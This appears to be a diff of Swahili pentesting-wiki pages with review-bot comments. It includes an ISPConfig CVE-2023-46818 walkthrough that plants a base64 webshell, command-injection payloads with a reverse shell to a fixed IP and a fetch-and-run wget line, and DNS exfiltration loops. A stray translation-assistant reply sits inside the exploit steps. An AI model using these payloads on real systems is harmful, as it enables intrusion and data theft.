- [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Remove URLs with duplicated functionalities (based on js imports)
- [**Chamaleon**](https://github.com/iustin24/chameleon): It uses wapalyzer to detect used technologies and select the wordlists to use.
**Orodha zinazopendekezwa:**
**Recommended dictionaries:**
- [https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt)
- [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt)
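Review bot: same regression as the previous hunk: the whole spidering tool list, the directory brute-force tool list, the `Tools:` / `Recommended dictionaries:` labels and the `Information about SSL/TLS vulnerabilities:` line go from Swahili back to English, while only the intro paragraph (`Anzisha aina fulani ya spider ...`) is actually retranslated. Keep the Swahili tool descriptions (or retranslate them) and, while touching these lines, fix the carried-over typos `HML spider`, `LinkFider`, `beatified` and `paramters`, and the unclosed parenthesis at the end of the waymore entry.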
@ -267,81 +268,83 @@ Zana:
- _/usr/share/wordlists/dirb/big.txt_
- _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
_Kumbuka kwamba kila wakati directory mpya inapatikana wakati wa brute-forcing au spidering, inapaswa kufanywa Brute-Forced._
_Kumbuka kwamba kila wakati direktorisi mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kufanyiwa Brute-Forced._
### Nini cha kuangalia kwenye kila faili iliyopatikana
### What to check on each file found
- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Pata viungo vilivyovunjika ndani ya HTMLs ambavyo vinaweza kuwa na uwezekano wa kuchukuliwa.
- **File Backups**: Mara tu unapokuwa umepata faili zote, angalia nakala za faili zote zinazoweza kutekelezwa ("_.php_", "_.aspx_"...). Mabadiliko ya kawaida ya kutaja nakala ni: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp na file.old._ Unaweza pia kutumia chombo [**bfac**](https://github.com/mazen160/bfac) **au** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Gundua parameta mpya**: Unaweza kutumia zana kama [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **na** [**Param Miner**](https://github.com/PortSwigger/param-miner) **kugundua parameta zilizofichwa. Ikiwa unaweza, unaweza kujaribu kutafuta** parameta zilizofichwa kwenye kila faili ya wavuti inayoweza kutekelezwa.
- _Arjun orodha zote za maneno za kawaida:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
- **File Backups**: Mara utakapopata faili zote, tafuta backups za faili zote za executable ("_.php_", "_.aspx_"...). Mabadiliko ya kawaida ya majina ya backup ni: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ Unaweza pia kutumia tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Discover new parameters**: Unaweza kutumia tools kama [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **kugundua parameters zilizofichwa. Ikiwa utaweza, jaribu kutafuta** hidden parameters kwenye kila executable web file.
- _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
- _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
- _Assetnote “parameters_top_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
- _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
- **Maoni:** Angalia maoni ya faili zote, unaweza kupata **credentials** au **ufunctionality iliyofichwa**.
- Ikiwa unacheza **CTF**, hila "ya kawaida" ni **kuficha** **habari** ndani ya maoni upande wa **kulia** wa **ukurasa** (ukitumia **mifumo** **miyingi** ili usione data ikiwa unafungua msimbo wa chanzo na kivinjari). Uwezekano mwingine ni kutumia **michoro kadhaa mipya** na **kuficha habari** katika maoni kwenye **chini** ya ukurasa wa wavuti.
- **API keys**: Ikiwa **unapata funguo zozote za API** kuna mwongozo unaoelekeza jinsi ya kutumia funguo za API za majukwaa tofauti: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Funguo za Google API: Ikiwa unapata funguo zozote za API zinazoonekana kama **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik unaweza kutumia mradi [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) kuangalia ni APIs zipi funguo hiyo inaweza kufikia.
- **S3 Buckets**: Wakati wa spidering angalia ikiwa **subdomain** au kiungo chochote kinahusiana na **S3 bucket**. Katika kesi hiyo, [**angalia** **permissions** za bucket](buckets/index.html).
- **Comments:** Angalia comments za faili zote, unaweza kupata **credentials** au **hidden functionality**.
- If you are playing **CTF**, ujanja "wa kawaida" ni ku**ficha** **taarifa** ndani ya comments upande wa **kulia** wa **ukurasa** (kwa kutumia **mamia** ya **spaces** hivyo huwezi kuona data ikiwa utafungua source code kwa browser). Mwingine uwezekano ni kutumia **several new lines** na **kuhifadhi taarifa** kwenye comment mwishoni mwa ukurasa wa wavuti.
- **API keys**: Ikiwa **unapata API key** kuna mwongozo unaoelezea jinsi ya kutumia API keys za platforms mbalimbali: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Google API keys: Ikiwa unapata API key inayofanana na **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik unaweza kutumia project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) kuona ni APIs gani key inaweza kupata.
- **S3 Buckets**: Wakati wa spidering angalia kama subdomain yoyote au link yoyote ina uhusiano na S3 bucket. Katika hili, [**angalia** the **permissions** of the bucket](buckets/index.html).
### Matokeo Maalum
### Special findings
**Wakati** wa kufanya **spidering** na **brute-forcing** unaweza kupata **mambo ya kuvutia** ambayo unapaswa **kuangazia**.
**Wakati wa** kufanya **spidering** na **brute-forcing** unaweza kupata vitu **vichangamsha** ambavyo unapaswa **kutambua**.
**Faili za Kuvutia**
**Interesting files**
- Angalia **viungo** kwa faili nyingine ndani ya **CSS** files.
- [Ikiwa unapata faili ya _**.git**_ habari fulani inaweza kutolewa](git.md)
- Ikiwa unapata _**.env**_ habari kama funguo za api, nywila za db na habari nyingine zinaweza kupatikana.
- Ikiwa unapata **API endpoints** unapaswa pia kujaribu [kuzi](web-api-pentesting.md). Hizi si faili, lakini labda "zitakuwa" kama hizo.
- **Faili za JS**: Katika sehemu ya spidering zana kadhaa ambazo zinaweza kutoa njia kutoka kwa faili za JS zilitajwa. Pia, itakuwa ya kuvutia **kufuatilia kila faili ya JS iliyopatikana**, kwani katika baadhi ya matukio, mabadiliko yanaweza kuashiria kuwa udhaifu wa uwezekano umeingizwa katika msimbo. Unaweza kutumia kwa mfano [**JSMon**](https://github.com/robre/jsmon)**.**
- Unapaswa pia kuangalia faili za JS zilizogunduliwa na [**RetireJS**](https://github.com/retirejs/retire.js/) au [**JSHole**](https://github.com/callforpapers-source/jshole) ili kuona ikiwa ni dhaifu.
- **Javascript Deobfuscator na Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
- Tafuta **links** za faili nyingine ndani ya **CSS** files.
- [If you find a _**.git**_ file some information can be extracted](git.md)
- Ikiwa unapata _**.env**_ unaweza kupata taarifa kama api keys, dbs passwords na taarifa nyingine.
- Ikiwa unapata **API endpoints** unapaswa [pia kuzijaribu](web-api-pentesting.md). Hizi si faili, lakini kwa kawaida "zinaweza kuonekana" kama faili.
- **JS files**: Katika sehemu ya spidering zimetajwa tools kadhaa ambazo zinaweza kutoa paths kutoka kwa JS files. Pia, itakuwa muhimu **kuangalia kila JS file uliyoipata**, kwani wakati mwingine, mabadiliko yanaweza kuashiria kwamba ranakuwepo vulnerability mpya kwenye code. Unaweza kutumia mfano [**JSMon**](https://github.com/robre/jsmon)**.**
- Unapaswa pia kukagua JS files zilizogunduliwa kwa kutumia [**RetireJS**](https://github.com/retirejs/retire.js/) au [**JSHole**](https://github.com/callforpapers-source/jshole) kuona kama zina vulnerabilities.
- **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
- **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
- **JsFuck deobfuscation** (javascript na herufi:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
- **JsFuck deobfuscation** (javascript with chars:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
- [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- Katika matukio kadhaa, itabidi **uelewe kanuni za kawaida** zinazotumika. Hii itakuwa na manufaa: [https://regex101.com/](https://regex101.com) au [https://pythonium.net/regex](https://pythonium.net/regex)
- Unaweza pia **kufuatilia faili ambapo fomu zilipatikana**, kwani mabadiliko katika parameta au kuonekana kwa fomu mpya kunaweza kuashiria uwezekano wa kazi mpya yenye udhaifu.
- Katika matukio mengi, utahitaji **kuelewa regular expressions** zinazotumika. Hii itakuwa ya msaada: [https://regex101.com/](https://regex101.com) au [https://pythonium.net/regex](https://pythonium.net/regex)
- Pia unaweza **kuangalia files ambazo ziligunduliwa kuwa zina forms**, kwani mabadiliko kwenye parameter au kuonekana kwa form mpya kunaweza kuashiria functionality mpya yenye hatari.
**403 Forbidden/Basic Authentication/401 Unauthorized (bypass)**
{{#ref}}
403-and-401-bypasses.md
{{#endref}}
**502 Proxy Error**
Ikiwa ukurasa wowote **unajibu** na **nambari** hiyo, labda ni **proxy iliyo na usakinishaji mbaya**. **Ikiwa unatumia ombi la HTTP kama: `GET https://google.com HTTP/1.1`** (pamoja na kichwa cha mwenyeji na vichwa vingine vya kawaida), **proxy** itajaribu **kufikia** _**google.com**_ **na utakuwa umepata** SSRF.
Kama ukurasa wowote **unareact** kwa hiyo **code**, inawezekana kuwa ni **proxy iliyo misconfigured mbaya**. **Kama utatuma request ya HTTP kama: `GET https://google.com HTTP/1.1`** (ikiwa na host header na headers nyingine za kawaida), **proxy** itajaribu **kupata** _**google.com**_ **na utakuwa umepata** SSRF.
**NTLM Authentication - Info disclosure**
Ikiwa seva inayotumika inahitaji uthibitisho ni **Windows** au unapata kuingia inayohitaji **credentials** zako (na kuomba **jina la** **domain**), unaweza kusababisha **ufichuzi wa habari**.\
**Tuma** **kichwa**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` na kutokana na jinsi **uthibitisho wa NTLM unavyofanya kazi**, seva itajibu kwa habari za ndani (toleo la IIS, toleo la Windows...) ndani ya kichwa "WWW-Authenticate".\
Unaweza **kujiandaa** hii kwa kutumia **nmap plugin** "_http-ntlm-info.nse_".
Ikiwa server inayouliza authentication ni **Windows** au unapata login inayounga mkono **credentials** zako (na kuuliza **domain** **name**), unaweza kusababisha **info disclosure**.\
**Tuma** **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` na kutokana na jinsi **NTLM authentication inavyofanya kazi**, server itajibu kwa info za ndani (toleo la IIS, toleo la Windows...) ndani ya header "WWW-Authenticate".\
Unaweza **kuendesha hii kwa automation** kwa kutumia **nmap plugin** "_http-ntlm-info.nse_".
**HTTP Redirect (CTF)**
Inawezekana **kweka maudhui** ndani ya **Redirection**. Maudhui haya **hayataonyeshwa kwa mtumiaji** (kama kivinjari kitatekeleza redirection) lakini kitu kinaweza kuwa **kimefichwa** humo.
Inawezekana **kuweka content** ndani ya **Redirection**. Content hii **haitaonyeshwa kwa mtumiaji** (kwa sababu browser itafanya redirect) lakini kuna kitu kinaweza kuwa **kimefichwa** ndani yake.
### Kuangalia Udhaifu wa Wavuti
### Web Vulnerabilities Checking
Sasa baada ya kufanya enumeration kamili ya web application ni wakati wa kuangalia aina nyingi za possible vulnerabilities. Unaweza kupata checklist hapa:
Sasa kwamba orodha kamili ya programu ya wavuti imefanywa ni wakati wa kuangalia udhaifu wengi wa uwezekano. Unaweza kupata orodha ya ukaguzi hapa:
{{#ref}}
../../pentesting-web/web-vulnerabilities-methodology.md
{{#endref}}
Pata maelezo zaidi kuhusu udhaifu wa wavuti katika:
Find more info about web vulns in:
- [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
- [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html)
- [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection)
### Fuata Kurasa kwa Mabadiliko
### Monitor Pages for changes
Unaweza kutumia zana kama [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) kufuatilia kurasa kwa mabadiliko ambayo yanaweza kuingiza udhaifu.
Unaweza kutumia tools kama [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) kufuatilia kurasa kwa mabadiliko ambayo yanaweza kuingiza vulnerabilities.
### HackTricks Amri za Moja kwa Moja
### HackTricks Automatic Commands
```
Protocol_Name: Web #Protocol Abbreviation if there is one.
Port_Number: 80,443 #Comma separated if there is more than one.
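Review bot: the RegHex link in the API keys bullet is malformed in both the removed and the added line: `[**RegHex**](<https://github.com/l4yton/RegHex)/>)` wraps the URL in angle brackets and carries a stray `)/>` so it will not render as a working link; since this line is being rewritten anyway, fix it to `[**RegHex**](https://github.com/l4yton/RegHex)` in the new version.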

View File

@ -0,0 +1,91 @@
# ISPConfig
{{#include ../../banners/hacktricks-training.md}}
## Muhtasari
ISPConfig ni paneli ya usimamizi wa hosting yenye chanzo wazi. Mjenzi wa zamani wa 3.2.x uliweka kipengele cha mhariri wa faili za lugha ambacho, kitakapoamilishwa kwa msimamizi mkuu, kiliruhusu kuingizwa kwa msimbo wa PHP wa hiari kupitia rekodi ya tafsiri iliyoharibika. Hii inaweza kusababisha RCE katika muktadha wa web server na, kulingana na jinsi PHP inavyotekelezwa, kuongezeka kwa ruhusa.
Njia za default muhimu:
- Web root mara nyingi iko katika `/var/www/ispconfig` inapohudumiwa na `php -S` au kupitia Apache/nginx.
- Admin UI inapatikana kwenye HTTP(S) vhost (wakati mwingine imefungwa kwa localhost tu; tumia SSH port-forward ikiwa inahitajika).
Kidokezo: Ikiwa paneli imefungwa kwa ndani (mfano `127.0.0.1:8080`), iforward:
```bash
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001
```
## Mhariri wa lugha PHP code injection (CVE-2023-46818)
- Waliathirika: ISPConfig hadi 3.2.11 (fixed in 3.2.11p1)
- Masharti ya awali:
- Ingia kama akaunti ya superadmin iliyojengwa ndani `admin` (mawadhifa/majukumu mengine hayahusiki kulingana na muuzaji)
- Mhariri wa lugha lazima uwe umewezeshwa: `admin_allow_langedit=yes` katika `/usr/local/ispconfig/security/security_settings.ini`
- Athari: Admin aliethibitishwa anaweza kuingiza PHP yoyote inayohifadhiwa kwenye faili la lugha na kutekelezwa na programu, akipata RCE katika muktadha wa wavuti
Marejeo: NVD entry CVE-2023-46818 na kiungo cha ushauri cha muuzaji katika sehemu ya Marejeo hapa chini.
### Manual exploitation flow
1) Fungua/unda faili la lugha ili kupata tokeni za CSRF
Tuma POST ya kwanza ili kuanzisha fomu na kuchambua viwanja vya CSRF kutoka kwenye majibu ya HTML (`csrf_id`, `csrf_key`). Mfano wa njia ya ombi: `/admin/language_edit.php`.
2) Inject PHP via records[] and save
Tuma POST ya pili ikijumuisha viwanja vya CSRF na rekodi ya tafsiri hatarishi. Minimal command-execution probes:
```http
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...
lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
```
Mtihani wa Out-of-band (angalia ICMP):
```http
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
```
3) Andika faili na weke webshell
Tumia `file_put_contents` kuunda faili ndani ya path inayoweza kufikiwa kupitia wavuti (mfano, `admin/`):
```http
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
```
Kisha andika webshell rahisi ukitumia base64 ili kuepuka herufi mbaya katika mwili wa POST:
```http
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
```
I don't have the file contents. Please paste the markdown from src/network-services-pentesting/pentesting-web/ispconfig.md (or attach it) and I will translate the relevant English text to Swahili following your rules.
```bash
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
```
Ikiwa PHP inaendeshwa kama root (kwa mfano, kupitia `php -S 127.0.0.1:8080` iliyoanzishwa na root), hii inatoa RCE ya root mara moja. Vinginevyo, unapata utekelezaji wa msimbo kama mtumiaji wa server ya wavuti.
### Python PoC
Exploit tayari kwa kutumia huotomatiza kushughulikia token na kusambaza payload:
- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
Mfano wa utekelezaji:
```bash
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
```
### Kuimarisha usalama
- Sasisha hadi 3.2.11p1 au baadaye
- Zima mhariri wa lugha isipokuwa ikihitajika kabisa:
```
admin_allow_langedit=no
```
- Epuka kuendesha paneli kama root; sanidi PHP-FPM au web server ili kupunguza idhini za ufikiaji
- Lazimisha uthibitishaji imara kwa akaunti ya `admin` iliyojengwa
## Marejeo
- [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/)
- [CVE-2023-46818 NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
{{#include ../../banners/hacktricks-training.md}}
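Review bot: the line "I don't have the file contents. Please paste the markdown from src/network-services-pentesting/pentesting-web/ispconfig.md (or attach it) and I will translate the relevant English text to Swahili following your rules." sitting directly above the `curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'` block is leftover output from the translation assistant, not page content; it has replaced the lead-in sentence that introduces that curl call, so restore that sentence from the English source file before merging, otherwise the new ispconfig.md ships with a chatbot prompt in the middle of the exploitation flow.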

View File

@ -2,13 +2,13 @@
{{#include ../banners/hacktricks-training.md}}
## What is command Injection?
## Je, Command Injection ni nini?
A **command injection** inaruhusu utekelezaji wa amri za mfumo wa uendeshaji zisizo na mipaka na mshambuliaji kwenye seva inayohifadhi programu. Kama matokeo, programu na data zake zote zinaweza kuathiriwa kabisa. Utekelezaji wa amri hizi kawaida unaruhusu mshambuliaji kupata ufikiaji usioidhinishwa au kudhibiti mazingira ya programu na mfumo wa msingi.
A **command injection** inaruhusu utekelezaji wa amri yoyote za mfumo wa uendeshaji na mshambuliaji kwenye server inayohifadhi application. Kwa matokeo, application na data zake zote zinaweza kuathiriwa/kufauliwa kabisa. Utekelezaji wa amri hizi kwa kawaida huwapa mshambuliaji ufikiaji usioidhinishwa au udhibiti wa mazingira ya application na mfumo wa msingi.
### Context
### Muktadha
Kulingana na **mahali ambapo ingizo lako linatolewa** unaweza kuhitaji **kufunga muktadha ulioandikwa** (ukitumia `"` au `'`) kabla ya amri.
Kulingana na **wapi ingizo lako linaingizwa** unaweza kuhitaji **kumaliza muktadha uliowekwa kwa nukuu** (ukitumia `"` au `'`) kabla ya amri.
## Command Injection/Execution
```bash
@ -18,6 +18,7 @@ ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a # (Combining new lines and tabs)
#Only unix supported
`ls` # ``
@ -29,16 +30,16 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
```
### **Limitation** Bypasses
### **Limition** Bypasses
Ikiwa unajaribu kutekeleza **amri za kiholela ndani ya mashine ya linux** utavutiwa kusoma kuhusu hizi **Bypasses:**
Ikiwa unajaribu kutekeleza **amri za hiari ndani ya mashine ya linux** utapendezwa kusoma kuhusu haya **Bypasses:**
{{#ref}}
../linux-hardening/bypass-bash-restrictions/
{{#endref}}
### **Examples**
### **Mifano**
```
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
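Review bot: the heading change introduces a typo: `### **Limitation** Bypasses` is replaced by `### **Limition** Bypasses`; keep `Limitation` (or translate it fully) rather than shipping the misspelt form.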
@ -46,7 +47,7 @@ vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod
```
### Parameters
Hapa kuna vigezo 25 bora ambavyo vinaweza kuwa na udhaifu wa kuingiza msimbo na udhaifu wa RCE unaofanana (kutoka [link](https://twitter.com/trbughunters/status/1283133356922884096)):
Hapa kuna vigezo 25 vya juu vinavyoweza kuwa nyeti kwa code injection na RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)):
```
?cmd={payload}
?exec={payload}
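Review bot: the rewritten Parameters sentence regresses to English for the source attribution, `(from [link](...))`, where the removed line already had the Swahili `(kutoka [link](...))`; keep `kutoka` so the sentence is not half-translated.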
@ -90,7 +91,7 @@ sys 0m0.000s
```
### DNS based data exfiltration
Kulingana na chombo kutoka `https://github.com/HoLyVieR/dnsbin` pia kinachohifadhiwa kwenye dnsbin.zhack.ca
Imetegemea tool kutoka `https://github.com/HoLyVieR/dnsbin` pia inayoendeshwa kwenye dnsbin.zhack.ca
```
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
@ -100,7 +101,7 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
```
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```
Online tools to check for DNS based data exfiltration:
Zana za mtandaoni za kuangalia DNS based data exfiltration:
- dnsbin.zhack.ca
- pingb.in
@ -121,7 +122,7 @@ powershell C:**2\n??e*d.*? # notepad
### Node.js `child_process.exec` vs `execFile`
Wakati wa kukagua JavaScript/TypeScript back-ends mara nyingi utapata Node.js `child_process` API.
Unapofanya ukaguzi wa JavaScript/TypeScript back-ends, mara nyingi utakutana na Node.js `child_process` API.
```javascript
// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
@ -129,9 +130,9 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay
/* … */
});
```
`exec()` inazalisha **shell** (`/bin/sh -c`), hivyo kila herufi ambayo ina maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati pembejeo ya mtumiaji inachanganywa katika string.
`exec()` huanzisha **shell** (`/bin/sh -c`), hivyo alama yoyote inayokuwa na maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati ingizo la mtumiaji linapounganishwa katika msururu wa herufi.
**Mitigation:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na utoe **kila hoja kama kipengele tofauti cha array** ili shell isihusike:
**Kupunguza hatari:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na toa **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusishwe:
```javascript
const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
@ -139,7 +140,7 @@ execFile('/usr/bin/do-something', [
'--payload', JSON.stringify(payload)
]);
```
Mifano halisi: *Synology Photos* ≤ 1.7.0-0794 ilitumiwa kupitia tukio la WebSocket lisilo na uthibitisho ambalo lilihifadhi data inayodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye ilijumuishwa katika wito wa `exec()`, ikipata RCE (Pwn2Own Ireland 2024).
Kisa cha ulimwengu halisi: *Synology Photos* ≤ 1.7.0-0794 kilikuwa kinaweza kutumika kupitia tukio la WebSocket lisilo na uthibitisho ambalo liliweka data iliyodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye ilingizwa katika wito la `exec()`, ikipelekea RCE (Pwn2Own Ireland 2024).
## Orodha ya Ugunduzi wa Brute-Force
@ -148,11 +149,13 @@ Mifano halisi: *Synology Photos* ≤ 1.7.0-0794 ilitumiwa kupitia tukio la WebSo
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt
{{#endref}}
## Marejeleo
## Marejeo
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
- [Extraction of Synology encrypted archives Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE202346818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
{{#include ../banners/hacktricks-training.md}}
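Review bot: the added reference line duplicates the one directly above it; the PayloadsAllTheThings Command Injection link now appears twice in the Marejeo list, so drop the added copy and keep only the new HTB Nocturnal entry.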

View File

@ -2,20 +2,21 @@
{{#include ../banners/hacktricks-training.md}}
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) inajitokeza wakati mwisho wa wavuti au API unatoa au unakubali kitambulisho kinachoweza kudhibitiwa na mtumiaji ambacho kinatumika **moja kwa moja** kufikia kitu cha ndani **bila kuthibitisha kwamba mpiga simu anaidhinishwa** kufikia/kubadilisha kitu hicho. Utekelezaji wa mafanikio kawaida unaruhusu kupanda kwa haki za usawa au wima kama kusoma au kubadilisha data za watumiaji wengine na, katika hali mbaya, kuchukua akaunti kamili au kuhamasisha data kwa wingi.
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) hujitokeza wakati endpoint ya web au API inaonyesha au inakubali kitambulisho kinachoweza kudhibitiwa na mtumiaji ambacho kinatumika **moja kwa moja** kufikia kitu cha ndani **bila kuthibitisha kwamba aliyeita ana idhini** ya kufikia/kuhariri kitu hicho.
Utekelezaji unaofanikiwa kwa kawaida unaruhusu kuongezeka kwa mamlaka kwa njia ya horizontal au vertical, kama kusoma au kuhariri data za watumiaji wengine na, katika kesi mbaya kabisa, kunyongwa udhibiti wa akaunti au kutoa data kwa wingi.
---
## 1. Kutambua IDOR zinazoweza kutokea
## 1. Kutambua IDOR Zinaoweza Kutokea
1. Tafuta **parameta zinazorejelea kitu**:
* Njia: `/api/user/1234`, `/files/550e8400-e29b-41d4-a716-446655440000`
* Swali: `?id=42`, `?invoice=2024-00001`
* Mwili / JSON: `{"user_id": 321, "order_id": 987}`
* Vichwa / Cookies: `X-Client-ID: 4711`
2. Prefer mwisho ambao **unasoma au kubadilisha** data (`GET`, `PUT`, `PATCH`, `DELETE`).
3. Kumbuka wakati vitambulisho ni **mfuatano au vinavyoweza kutabiriwa** ikiwa ID yako ni `64185742`, basi `64185741` huenda ipo.
4. Chunguza njia zilizofichwa au mbadala (mfano *"Paradox team members"* kiungo kwenye kurasa za kuingia) ambazo zinaweza kufichua APIs za ziada.
